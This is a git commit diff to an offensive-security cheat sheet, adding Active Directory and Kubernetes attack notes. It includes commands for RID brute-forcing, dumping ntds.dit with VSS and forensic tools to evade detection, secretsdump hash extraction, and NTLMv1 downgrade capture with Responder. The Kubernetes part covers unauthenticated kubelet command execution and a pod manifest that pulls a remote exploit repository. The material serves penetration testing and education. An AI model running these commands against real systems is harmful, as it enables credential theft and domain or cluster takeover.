LM + Kubes
parent
b0e9832057
commit
e57e4121fa
|
@ -309,7 +309,7 @@ Enumerate users from the Domain Controllers.
|
|||
|
||||
* Using `netexec`
|
||||
```ps1
|
||||
netexec smb 10.10.11.231 -u guest -p '' --rid-brute
|
||||
netexec smb 10.10.11.231 -u guest -p '' --rid-brute 10000 --log rid-brute.txt
|
||||
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
|
||||
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
|
||||
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
|
||||
|
|
|
@ -48,15 +48,32 @@ The VSS is a Windows service that allows users to create snapshots or backups of
|
|||
```powershell
|
||||
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
||||
```
|
||||
* [netexec VSS module](https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-ntds.dit)
|
||||
* [Pennyw0rth/NetExec](https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-ntds.dit) - VSS module
|
||||
```powershell
|
||||
nxc smb 10.10.0.202 -u username -p password --ntds vss
|
||||
```
|
||||
|
||||
|
||||
## Forensic Tools
|
||||
|
||||
A good method for avoiding or reducing detections involves using common forensic tools to dump the NTDS.dit file and the SYSTEM hive. By utilizing widely recognized and legitimate forensic software, the process can be conducted more discreetly and with a lower risk of triggering security alerts.
|
||||
|
||||
|
||||
* Dump the memory with [magnet/dumpit](https://www.magnetforensics.com/resources/magnet-dumpit-for-windows/)
|
||||
* Use volatility to extract the `SYSTEM` hive
|
||||
```ps1
|
||||
volatility -f test.raw windows.registry.printkey.PrintKey
|
||||
volatility --profile=Win10x64_14393 dumpregistry -o 0xaf0287e41000 -D output_vol -f test.raw
|
||||
```
|
||||
* Use [exterro/ftk-imager](https://www.exterro.com/digital-forensics-software/ftk-imager) to read the disk in raw state
|
||||
* Go to `File` -> `Add Evidence Item` -> `Physical Drive` -> `Select the C drive`.
|
||||
* Export `C:\Windows\NTDS\ntds.dit`.
|
||||
* Finally use secretdump: `secretsdump.py LOCAL -system output_vol/registry.0xaf0287e41000.SYSTEM.reg -ntds ntds.dit`
|
||||
|
||||
|
||||
## Extract hashes from ntds.dit
|
||||
|
||||
then you need to use [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit
|
||||
Then you need to use [impacket/secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit
|
||||
|
||||
```java
|
||||
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||
|
@ -157,4 +174,5 @@ mimikatz> lsadump::lsa /inject /name:krbtgt
|
|||
|
||||
* [Diskshadow The Return Of VSS Evasion Persistence And AD Db Extraction - bohops - March 26, 2018](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||
* [Dumping Domain Password Hashes - Pentestlab - July 4, 2018](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
|
||||
* [Using Ntdissector To Extract Secrets From Adam Ntds Files - Julien Legras, Mehdi Elyassa - 06/12/2023](https://www.synacktiv.com/publications/using-ntdissector-to-extract-secrets-from-adam-ntds-files)
|
||||
* [Using Ntdissector To Extract Secrets From Adam Ntds Files - Julien Legras, Mehdi Elyassa - 06/12/2023](https://www.synacktiv.com/publications/using-ntdissector-to-extract-secrets-from-adam-ntds-files)
|
||||
* [Bypassing EDR NTDS.dit protection using BlueTeam tools - bilal al-qurneh - Jun 9, 2024](https://medium.com/@0xcc00/bypassing-edr-ntds-dit-protection-using-blueteam-tools-1d161a554f9f)
|
|
@ -1,18 +1,35 @@
|
|||
# Hash - Capture and Cracking
|
||||
|
||||
## LmCompatibilityLevel
|
||||
|
||||
LmCompatibilityLevel is a Windows security setting that determines the level of authentication protocol used between computers. It specifies how Windows handles NTLM and LAN Manager (LM) authentication protocols, impacting how passwords are stored and how authentication requests are processed. The level can range from 0 to 5, with higher levels generally providing more secure authentication methods.
|
||||
|
||||
```ps1
|
||||
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel
|
||||
```
|
||||
|
||||
* **Level 0** - Send LM and NTLM response; never use NTLM 2 session security. Clients use LM and NTLM authentication, and never use NTLM 2 session security; domain controllers accept LM, NTLM, and NTLM 2 authentication.
|
||||
* **Level 1** - Use NTLM 2 session security if negotiated. Clients use LM and NTLM authentication, and use NTLM 2 session security if the server supports it; domain controllers accept LM, NTLM, and NTLM 2 authentication.
|
||||
* **Level 2** - Send NTLM response only. Clients use only NTLM authentication, and use NTLM 2 session security if the server supports it; domain controllers accept LM, NTLM, and NTLM 2 authentication.
|
||||
* **Level 3** - Send NTLM 2 response only. Clients use NTLM 2 authentication, and use NTLM 2 session security if the server supports it; domain controllers accept LM, NTLM, and NTLM 2 authentication.
|
||||
* **Level 4** - Domain controllers refuse LM responses. Clients use NTLM authentication, and use NTLM 2 session security if the server supports it; domain controllers refuse LM authentication (that is, they accept NTLM and NTLM 2).
|
||||
* **Level 5** - Domain controllers refuse LM and NTLM responses (accept only NTLM 2). Clients use NTLM 2 authentication, use NTLM 2 session security if the server supports it; domain controllers refuse NTLM and LM authentication (they accept only NTLM 2).A client computer can only use one protocol in talking to all servers. You cannot configure it, for example, to use NTLM v2 to connect to Windows 2000-based servers and then to use NTLM to connect to other servers. This is by design.
|
||||
|
||||
|
||||
## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens
|
||||
|
||||
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
|
||||
|
||||
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
|
||||
:information_source: Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
|
||||
|
||||
**Requirements**:
|
||||
|
||||
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
|
||||
* `LmCompatibilityLevel = 0x1`: Send LM and NTLM response
|
||||
|
||||
|
||||
**Exploitation**:
|
||||
|
||||
* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
|
||||
* Capturing using [lgandx/Responder](https://github.com/lgandx/Responder): Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
|
||||
```ps1
|
||||
HTTPS = On
|
||||
DNS = On
|
||||
|
@ -96,4 +113,8 @@ hashcat -m 5600 -a 3 hash.txt
|
|||
|
||||
## References
|
||||
|
||||
* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb)
|
||||
* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb)
|
||||
* [Practical Attacks against NTLMv1 - Esteban Rodriguez - September 15, 2022](https://trustedsec.com/blog/practical-attacks-against-ntlmv1)
|
||||
* [Attacking LM/NTLMv1 Challenge/Response Authentication - defence in depth - April 21, 2011](http://www.defenceindepth.net/2011/04/attacking-lmntlmv1-challengeresponse_21.html)
|
||||
* [CRACKING NETLM/NETNTLMV1 AUTHENTICATION - crack.sh](https://crack.sh/netntlm/)
|
||||
* [NTLMv1 to NTLM Reversing - evilmog - 03-03-2020](https://hashcat.net/forum/thread-9009-post-47806.html)
|
|
@ -292,4 +292,5 @@ pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and c
|
|||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||
* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/)
|
||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover - Nick Powers - 07/27/2024](https://www.youtube.com/watch?v=iBqOOkQGJEA)
|
|
@ -44,9 +44,12 @@
|
|||
|
||||
### Accessible kubelet on 10250/TCP
|
||||
|
||||
Requirements:
|
||||
**Requirements**:
|
||||
|
||||
* `--anonymous-auth`: Enables anonymous requests to the Kubelet server
|
||||
|
||||
**Exploit**:
|
||||
|
||||
* Getting pods: `curl -ks https://worker:10250/pods`
|
||||
* Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'`
|
||||
|
||||
|
@ -60,8 +63,40 @@ Use the service account token:
|
|||
* with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="<TOKEN>" get secrets --all-namespaces -o json`
|
||||
|
||||
|
||||
### Create gitRepo Volumes to Execute Code
|
||||
|
||||
**Requirements**:
|
||||
|
||||
* [`gitRepo`](https://kubernetes.io/docs/concepts/storage/volumes/#gitrepo) volume type enabled
|
||||
* `create` rights on pods
|
||||
|
||||
**Exploit**:
|
||||
|
||||
```yml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: test-pd
|
||||
spec:
|
||||
containers:
|
||||
- image: alpine:latest
|
||||
command: ["sleep","86400"]
|
||||
name: test-container
|
||||
volumeMounts:
|
||||
- mountPath: /gitrepo
|
||||
name: gitvolume
|
||||
volumes:
|
||||
- name: gitvolume
|
||||
gitRepo:
|
||||
directory: g/.git
|
||||
repository: https://github.com/raesene/repopodexploit.git
|
||||
revision: main
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet)
|
||||
* [kubehound - Attack Reference](https://kubehound.io/reference/attacks/)
|
||||
* [KubeHound: Identifying attack paths in Kubernetes clusters - Datadog - October 2, 2023](https://securitylabs.datadoghq.com/articles/kubehound-identify-kubernetes-attack-paths/)
|
||||
* [KubeHound: Identifying attack paths in Kubernetes clusters - Datadog - October 2, 2023](https://securitylabs.datadoghq.com/articles/kubehound-identify-kubernetes-attack-paths/)
|
||||
* [Fun With GitRepo Volumes - Rory McCune - JULY 10TH, 2024](https://raesene.github.io/blog/2024/07/10/Fun-With-GitRepo-Volumes/)
|
|
@ -1,19 +1,5 @@
|
|||
# Bug Hunting Methodology
|
||||
|
||||
## Summary
|
||||
|
||||
* [Passive Recon](#passive-recon)
|
||||
* Shodan
|
||||
* Wayback Machine
|
||||
* The Harvester
|
||||
* Github OSINT
|
||||
|
||||
* [Active Recon](#active-recon)
|
||||
* [Network discovery](#network-discovery)
|
||||
* [Web discovery](#web-discovery)
|
||||
|
||||
* [Web Vulnerabilities](#looking-for-web-vulnerabilities)
|
||||
|
||||
## Passive recon
|
||||
|
||||
* Using [Shodan](https://www.shodan.io/) to detect similar app
|
||||
|
|
Loading…
Reference in New Issue